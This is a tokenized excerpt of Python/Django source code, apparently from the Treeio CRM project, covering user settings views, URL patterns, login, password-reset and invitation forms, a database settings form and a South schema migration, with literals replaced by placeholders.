: <EOL> conf = ModuleSetting . get_for_module ( <EOL> '<STR_LIT>' , '<STR_LIT>' , user = user ) [ <NUM_LIT:0> ] <EOL> default_permissions = conf . value <EOL> except : <EOL> default_permissions = settings . HARDTREE_DEFAULT_PERMISSIONS <EOL> try : <EOL> conf = ModuleSetting . get_for_module ( <EOL> '<STR_LIT>' , '<STR_LIT>' , user = user ) [ <NUM_LIT:0> ] <EOL> default_perspective = Perspective . objects . get ( pk = long ( conf . value ) ) <EOL> except : <EOL> default_perspective = None <EOL> language = getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> conf = ModuleSetting . get ( '<STR_LIT>' , user = user ) [ <NUM_LIT:0> ] <EOL> language = conf . value <EOL> except IndexError : <EOL> pass <EOL> all_languages = getattr ( <EOL> settings , '<STR_LIT>' , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> default_timezone = settings . HARDTREE_SERVER_DEFAULT_TIMEZONE <EOL> try : <EOL> conf = ModuleSetting . get ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> default_timezone = conf . value <EOL> except : <EOL> pass <EOL> try : <EOL> conf = ModuleSetting . get ( '<STR_LIT>' , user = user ) [ <NUM_LIT:0> ] <EOL> default_timezone = conf . value <EOL> except : <EOL> default_timezone = getattr ( <EOL> settings , '<STR_LIT>' ) [ default_timezone ] [ <NUM_LIT:0> ] <EOL> all_timezones = getattr ( settings , '<STR_LIT>' ) <EOL> email_notifications = getattr ( <EOL> settings , '<STR_LIT>' , False ) <EOL> try : <EOL> conf = ModuleSetting . get ( '<STR_LIT>' , user = user ) [ <NUM_LIT:0> ] <EOL> email_notifications = conf . value <EOL> except : <EOL> pass <EOL> try : <EOL> ns = NotificationSetting . objects . get ( owner = user , enabled = True ) <EOL> notifications_for_modules = [ m . title for m in ns . modules . all ( ) ] <EOL> except NotificationSetting . DoesNotExist : <EOL> notifications_for_modules = [ ] <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : default_permissions , <EOL> '<STR_LIT>' : default_perspective , <EOL> '<STR_LIT>' : language , <EOL> '<STR_LIT>' : all_languages , <EOL> '<STR_LIT>' : default_timezone , <EOL> '<STR_LIT>' : all_timezones , <EOL> '<STR_LIT>' : email_notifications , <EOL> '<STR_LIT>' : notifications_for_modules , <EOL> } , <EOL> context_instance = RequestContext ( request ) , response_format = response_format ) <EOL> @ handle_response_format <EOL> @ treeio_login_required <EOL> def settings_edit ( request , response_format = '<STR_LIT:html>' ) : <EOL> "<STR_LIT>" <EOL> if request . POST : <EOL> if '<STR_LIT>' not in request . POST : <EOL> form = SettingsForm ( request . user . profile , request . POST ) <EOL> if form . is_valid ( ) : <EOL> form . save ( ) <EOL> return HttpResponseRedirect ( reverse ( '<STR_LIT>' ) ) <EOL> else : <EOL> return HttpResponseRedirect ( reverse ( '<STR_LIT>' ) ) <EOL> else : <EOL> form = SettingsForm ( request . user . profile ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : Markup ( form . as_ul ( ) ) } , <EOL> context_instance = RequestContext ( request ) , response_format = response_format ) <EOL> def _process_mass_form ( f ) : <EOL> "<STR_LIT>" <EOL> def wrap ( request , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> user = request . user . profile <EOL> if '<STR_LIT>' in request . POST : <EOL> for key in request . POST : <EOL> if '<STR_LIT>' in key : <EOL> try : <EOL> report = NotificationSetting . objects . get ( pk = request . POST [ key ] ) <EOL> form = MassActionForm ( <EOL> user , request . POST , instance = report ) <EOL> if form . is_valid ( ) and user . has_permission ( report , mode = '<STR_LIT:w>' ) : <EOL> form . save ( ) <EOL> except : <EOL> pass <EOL> return f ( request , * args , ** kwargs ) <EOL> wrap . __doc__ = f . __doc__ <EOL> wrap . __name__ = f . __name__ <EOL> return wrap </s>
<s> from django . conf . urls import patterns , url <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , <EOL> name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , <EOL> name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , <EOL> name = "<STR_LIT>" ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> from django import forms <EOL> from django . db import router <EOL> from django . core . exceptions import ValidationError <EOL> from django . core . urlresolvers import reverse <EOL> from treeio . core . models import Object <EOL> from captcha . fields import CaptchaField <EOL> from django . utils . translation import ugettext as _ <EOL> from treeio . core . conf import settings <EOL> from django . db . models import Q <EOL> import django . contrib . auth . models as django_auth <EOL> from jinja2 . filters import do_striptags , do_truncate <EOL> from treeio . core . models import Location , User , Widget , Tag , ConfigSetting <EOL> from treeio . core . mail import EmailPassword <EOL> from treeio . identities . models import Contact , ContactType , ContactValue <EOL> class PermissionForm ( forms . ModelForm ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> super ( PermissionForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . help_text = "<STR_LIT>" <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . help_text = "<STR_LIT>" <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> class Meta : <EOL> "<STR_LIT>" <EOL> model = Object <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class SubscribeForm ( forms . Form ) : <EOL> "<STR_LIT>" <EOL> subscriber = forms . ModelChoiceField ( queryset = User . objects . all ( ) ) <EOL> def __init__ ( self , instance , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> subscriptions = instance . subscribers . all ( ) <EOL> super ( SubscribeForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . subscriptions = subscriptions <EOL> self . instance = instance <EOL> self . fields [ '<STR_LIT>' ] . label = "<STR_LIT>" <EOL> self . fields [ '<STR_LIT>' ] . queryset = User . objects . exclude ( <EOL> pk__in = subscriptions ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> def save ( self ) : <EOL> "<STR_LIT>" <EOL> user = self . cleaned_data [ '<STR_LIT>' ] <EOL> object = self . instance <EOL> if user not in self . subscriptions : <EOL> object . subscribers . add ( user ) <EOL> self . subscriptions = object . subscribers . all ( ) <EOL> return self . subscriptions <EOL> class ObjectLinksForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> links = forms . ModelChoiceField ( queryset = [ ] , empty_label = None , label = '<STR_LIT>' ) <EOL> def __init__ ( self , user , response_format , instance , * args , ** kwargs ) : <EOL> super ( ObjectLinksForm , self ) . __init__ ( * args , ** kwargs ) <EOL> queryset = Object . filter_permitted ( user , Object . objects ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = queryset <EOL> if '<STR_LIT>' not in response_format : <EOL> if instance : <EOL> queryset = queryset . exclude ( pk__in = instance . links . all ( ) ) <EOL> choices = [ ] <EOL> for obj in queryset : <EOL> human_type = obj . get_human_type ( ) <EOL> name = do_truncate ( <EOL> do_striptags ( unicode ( obj . object_name ) ) , <NUM_LIT:20> , True ) <EOL> if human_type : <EOL> name += u"<STR_LIT>" + human_type + u"<STR_LIT:)>" <EOL> choices . append ( ( obj . id , name ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = choices <EOL> self . fields [ '<STR_LIT>' ] . label = "<STR_LIT>" <EOL> self . fields [ '<STR_LIT>' ] . initial = "<STR_LIT>" <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> class TagsForm ( forms . Form ) : <EOL> tags = forms . ModelMultipleChoiceField ( queryset = Tag . objects . all ( ) ) <EOL> def __init__ ( self , tags , * args , ** kwargs ) : <EOL> super ( TagsForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . label = "<STR_LIT>" <EOL> self . fields [ '<STR_LIT>' ] . initial = [ tag . id for tag in tags ] <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> def save ( self ) : <EOL> return self . cleaned_data [ '<STR_LIT>' ] <EOL> class LoginForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> captcha = CaptchaField ( label = _ ( "<STR_LIT>" ) ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( LoginForm , self ) . __init__ ( * args , ** kwargs ) <EOL> if settings . CAPTCHA_DISABLE : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> class PasswordResetForm ( forms . Form ) : <EOL> "<STR_LIT>" <EOL> username = forms . CharField ( label = ( "<STR_LIT>" ) , max_length = <NUM_LIT> ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( PasswordResetForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:username>' ] . label = _ ( "<STR_LIT>" ) <EOL> def clean_username ( self ) : <EOL> """<STR_LIT>""" <EOL> username = self . cleaned_data [ "<STR_LIT:username>" ] <EOL> if '<STR_LIT:@>' in username : <EOL> emails = ContactValue . objects . filter ( value = username , <EOL> field__field_type = '<STR_LIT:email>' , <EOL> contact__trash = False , <EOL> contact__related_user__isnull = False ) <EOL> users = [ email . contact . related_user . user for email in emails ] <EOL> else : <EOL> users = User . objects . filter ( user__username = username ) <EOL> if len ( users ) == <NUM_LIT:0> : <EOL> raise forms . ValidationError ( <EOL> _ ( "<STR_LIT>" ) ) <EOL> else : <EOL> username = users [ <NUM_LIT:0> ] <EOL> return username <EOL> def save ( self ) : <EOL> "<STR_LIT>" <EOL> user = self . cleaned_data [ "<STR_LIT:username>" ] <EOL> if user : <EOL> toaddr = user . get_contact ( ) . get_email ( ) <EOL> if toaddr : <EOL> password = user . generate_new_password ( ) <EOL> email = EmailPassword ( toaddr , user . user . username , password ) <EOL> email . send_email ( ) <EOL> class InvitationForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> invitation = None <EOL> def __init__ ( self , invitation = None , * args , ** kwargs ) : <EOL> super ( InvitationForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:username>' ] = forms . CharField ( <EOL> max_length = <NUM_LIT:255> , label = _ ( "<STR_LIT>" ) ) <EOL> self . fields [ '<STR_LIT:name>' ] = forms . CharField ( <EOL> max_length = <NUM_LIT:255> , label = _ ( "<STR_LIT>" ) ) <EOL> self . fields [ '<STR_LIT:password>' ] = forms . CharField ( max_length = <NUM_LIT:255> , label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . PasswordInput ( render_value = False ) ) <EOL> self . fields [ '<STR_LIT>' ] = forms . CharField ( max_length = <NUM_LIT:255> , label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . PasswordInput ( render_value = False ) ) <EOL> self . invitation = invitation <EOL> def clean_username ( self ) : <EOL> "<STR_LIT>" <EOL> data = self . cleaned_data [ '<STR_LIT:username>' ] <EOL> query = Q ( name = data ) <EOL> existing = User . objects . filter ( query ) <EOL> if existing : <EOL> raise forms . ValidationError ( <EOL> _ ( "<STR_LIT>" ) % data ) <EOL> user_limit = getattr ( settings , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> if user_limit > <NUM_LIT:0> : <EOL> user_number = User . objects . filter ( disabled = False ) . count ( ) <EOL> if user_number >= user_limit : <EOL> raise forms . ValidationError ( <EOL> _ ( "<STR_LIT>" ) % ( user_limit ) ) <EOL> return data <EOL> def clean_password_again ( self ) : <EOL> "<STR_LIT>" <EOL> password1 = self . cleaned_data [ '<STR_LIT:password>' ] <EOL> password2 = self . cleaned_data [ '<STR_LIT>' ] <EOL> if not password1 == password2 : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> return password2 <EOL> def save ( self , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> profile = None <EOL> if self . invitation : <EOL> django_user = django_auth . User ( <EOL> username = self . cleaned_data [ '<STR_LIT:username>' ] , password = '<STR_LIT>' ) <EOL> django_user . set_password ( self . cleaned_data [ '<STR_LIT:password>' ] ) <EOL> django_user . save ( ) <EOL> try : <EOL> profile = django_user . profile <EOL> except : <EOL> profile = User ( ) <EOL> profile . user = django_user <EOL> profile . name = django_user . username <EOL> profile . default_group = self . invitation . default_group <EOL> profile . save ( ) <EOL> try : <EOL> contact_type = ContactType . objects . get ( <EOL> Q ( name = '<STR_LIT>' ) | Q ( slug = '<STR_LIT>' ) ) <EOL> except : <EOL> contact_type = ContactType . objects . all ( ) [ <NUM_LIT:0> ] <EOL> try : <EOL> contact = profile . get_contact ( ) <EOL> if not contact : <EOL> contact = Contact ( ) <EOL> except : <EOL> contact = Contact ( ) <EOL> contact . name = self . cleaned_data [ '<STR_LIT:name>' ] <EOL> contact . contact_type = contact_type <EOL> contact . related_user = profile <EOL> contact . save ( ) <EOL> try : <EOL> emailfield = contact_type . fields . filter ( field_type = '<STR_LIT:email>' ) [ <NUM_LIT:0> ] <EOL> email = ContactValue ( <EOL> value = self . invitation . email , field = emailfield , contact = contact ) <EOL> email . save ( ) <EOL> except : <EOL> pass <EOL> widget = Widget ( user = profile , <EOL> perspective = profile . get_perspective ( ) , <EOL> module_name = '<STR_LIT>' , <EOL> widget_name = '<STR_LIT>' ) <EOL> widget . save ( ) <EOL> return profile <EOL> class LocationForm ( forms . ModelForm ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , user , location_id , * args , ** kwargs ) : <EOL> super ( LocationForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:name>' ] . label = _ ( "<STR_LIT:Name>" ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Location . objects , mode = '<STR_LIT:x>' ) <EOL> if location_id : <EOL> self . fields [ '<STR_LIT>' ] . initial = location_id <EOL> class Meta : <EOL> "<STR_LIT>" <EOL> model = Location <EOL> fields = ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> class SqlSettingsForm ( forms . Form ) : <EOL> sql_engine = forms . ChoiceField ( choices = ( ( "<STR_LIT>" , _ ( '<STR_LIT>' ) , ) , ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , ( "<STR_LIT>" , _ ( '<STR_LIT>' ) ) , ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) ) ) <EOL> sql_database = forms . CharField ( max_length = <NUM_LIT> ) <EOL> sql_user = forms . CharField ( max_length = <NUM_LIT:30> ) <EOL> sql_password = forms . CharField ( <EOL> max_length = <NUM_LIT> , required = False , widget = forms . PasswordInput ) <EOL> def clean_sql_engine ( self ) : <EOL> engine = self . cleaned_data [ '<STR_LIT>' ] <EOL> return "<STR_LIT>" % engine <EOL> def create_database ( self ) : <EOL> if not self . _errors : <EOL> from django . db import connections <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from treeio . core . domains import setup_domain_database <EOL> database = { <EOL> '<STR_LIT>' : self . cleaned_data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self . cleaned_data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self . cleaned_data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : self . cleaned_data [ '<STR_LIT>' ] , <EOL> } <EOL> settings . DATABASES [ '<STR_LIT>' ] = database <EOL> try : <EOL> setup_domain_database ( '<STR_LIT>' , True ) <EOL> except ImproperlyConfigured as exc : <EOL> self . _errors [ '<STR_LIT>' ] = self . error_class ( <EOL> [ _ ( "<STR_LIT>" ) + exc . message ] ) <EOL> del self . cleaned_data [ '<STR_LIT>' ] <EOL> except Exception as exc : <EOL> del connections . _connections [ '<STR_LIT>' ] <EOL> raise ValidationError ( <EOL> _ ( "<STR_LIT>" ) + '<STR_LIT>' % exc ) <EOL> finally : <EOL> del settings . DATABASES [ '<STR_LIT>' ] <EOL> settings . DATABASES [ router . db_for_read ( ConfigSetting ) ] = database <EOL> connections . _connections . clear ( ) <EOL> if not getattr ( settings , '<STR_LIT>' , False ) : <EOL> settings_filepath = sys . modules [ <EOL> os . environ [ '<STR_LIT>' ] ] . __file__ <EOL> if settings_filepath . endswith ( '<STR_LIT>' ) : <EOL> settings_filepath = settings_filepath [ : - <NUM_LIT:1> ] <EOL> with open ( settings_filepath , '<STR_LIT:r>' ) as fl : <EOL> lines = fl . readlines ( ) <EOL> with open ( settings_filepath , '<STR_LIT:w>' ) as fl : <EOL> lines = iter ( lines ) <EOL> for line in lines : <EOL> if '<STR_LIT>' not in line : <EOL> fl . write ( line ) <EOL> else : <EOL> fl . write ( '<STR_LIT>' ) <EOL> break <EOL> fl . write ( repr ( settings . DATABASES ) ) <EOL> fl . write ( '<STR_LIT>' ) <EOL> for line in lines : <EOL> if '<STR_LIT:=>' in line : <EOL> fl . write ( line ) <EOL> break <EOL> for line in lines : <EOL> fl . write ( line ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) <EOL> ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( <EOL> to = orm [ '<STR_LIT>' ] , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( <EOL> to = orm [ '<STR_LIT>' ] , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( max_length = <NUM_LIT:100> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( max_length = <NUM_LIT:64> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) <EOL> ( auto_now_add = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( <EOL> to = orm [ '<STR_LIT>' ] ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:key>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : 